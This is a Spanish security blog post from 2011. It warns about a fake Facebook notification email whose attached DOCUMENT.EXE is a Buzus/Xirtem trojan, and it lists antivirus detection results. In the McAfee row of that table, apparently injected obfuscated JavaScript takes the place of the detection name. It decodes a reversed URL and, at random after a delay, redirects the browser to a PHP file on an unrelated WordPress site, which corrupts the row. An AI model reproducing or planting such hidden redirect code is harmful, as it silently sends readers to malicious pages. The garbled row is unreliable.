Fichero que llega anexado a un mail presuntamente enviado por un amigo desde Facebook

Publicado el 11 marzo 2011 ¬ 13:50 pmh.mscComentarios desactivados en Fichero que llega anexado a un mail presuntamente enviado por un amigo desde Facebook

La ingenieria social “convence” al usuario en este caso para que abra el fichero que se recibe anexado a un mail similar a este:

Asunto: You have got a new message on Facebook!
De: <remitente>
Fecha: Fri, 11 Mar 2011 20:39:07 +0900
Para: <destinatario>
facebook
Hi,
You have got a personal message on Facebook from your friend.
To read it please check the attachment.
Thanks,
The Facebook Team

El fichero anexado se llama Facebook message.zip  de 488 KB y desempaquetado aparece un DOCUMENT.EXE de 625 KB

El preanalisis de dicho fichero resulta ser un troyano BUZUS o XIRTEM, ya controlado por el actual ELISTARA:

File name: document.exe
Submission date: 2011-03-11 12:32:34 (UTC)
Current status: finished
Result: 40 /43 (93.0%)
VT Community

malware
Safety score: 0.0%
Compact Print results Antivirus Version Last Update Result
AhnLab-V3 2011.03.11.02 2011.03.11 Win-Trojan/Buzus.640512.D
AntiVir 7.11.4.168 2011.03.11 TR/Buzus.gdef
Antiy-AVL 2.0.3.7 2011.03.09 Trojan/Win32.Buzus.gen
Avast 4.8.1351.0 2011.03.11 Win32:Malware-gen
Avast5 5.0.677.0 2011.03.11 Win32:Malware-gen
AVG 10.0.0.1190 2011.03.11 Generic20.RDF
BitDefender 7.2 2011.03.11 Trojan.Generic.KDV.68538
CAT-QuickHeal 11.00 2011.03.11 Trojan.Buzus.gdef
ClamAV 0.96.4.0 2011.03.11 Trojan.Buzus-8525
Commtouch 5.2.11.5 2011.03.11 W32/Trojan3.CIH
Comodo 7941 2011.03.11 UnclassifiedMalware
DrWeb 5.0.2.03300 2011.03.11 Trojan.MulDrop1.54160
Emsisoft 5.1.0.2 2011.03.11 Win32.Outbreak!IK
eSafe 7.0.17.0 2011.03.10 –
eTrust-Vet 36.1.8210 2011.03.11 Win32/Fruspam.GD
F-Prot 4.6.2.117 2011.03.11 W32/Trojan3.CIH
F-Secure 9.0.16440.0 2011.03.11 Trojan-Downloader:W32/Malagent.C
Fortinet 4.2.254.0 2011.03.11 W32/Buzus.011E!tr
GData 21 2011.03.11 Trojan.Generic.KDV.68538
Ikarus T3.1.1.97.0 2011.03.11 Win32.Outbreak
Jiangmin 13.0.900 2011.03.11 Trojan/Buzus.slb
K7AntiVirus 9.93.4081 2011.03.11 Riskware
Kaspersky 7.0.0.125 2011.03.11 Email-Worm.Win32.Agent.gnd
McAfee 5.400.0.1158 2011.03.11 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Xirtem@MM”>W32/Xirtem@MM
Microsoft 1.6603 2011.03.11 Trojan:Win32/Meredrop
NOD32 5944 2011.03.11 Win32/Merond.O
Norman 6.07.03 2011.03.11 W32/Bredolab.ACX
nProtect 2011-02-10.01 2011.02.15 Trojan/W32.Agent.640512.U
Panda 10.0.3.5 2011.03.11 W32/VobfusLNK.A
PCTools 7.0.3.5 2011.03.11 Email-Worm.Ackantta
Prevx 3.0 2011.03.11 Medium Risk Malware
Rising 23.48.04.03 2011.03.11 Trojan.Win32.Generic.1259E3EC
Sophos 4.63.0 2011.03.11 W32/AutoRun-BHX
SUPERAntiSpyware 4.40.0.1006 2011.03.11 –
Symantec 20101.3.0.103 2011.03.11 __________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Redes sociales, Spam, Virus, , , , , , , , , , , ,

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies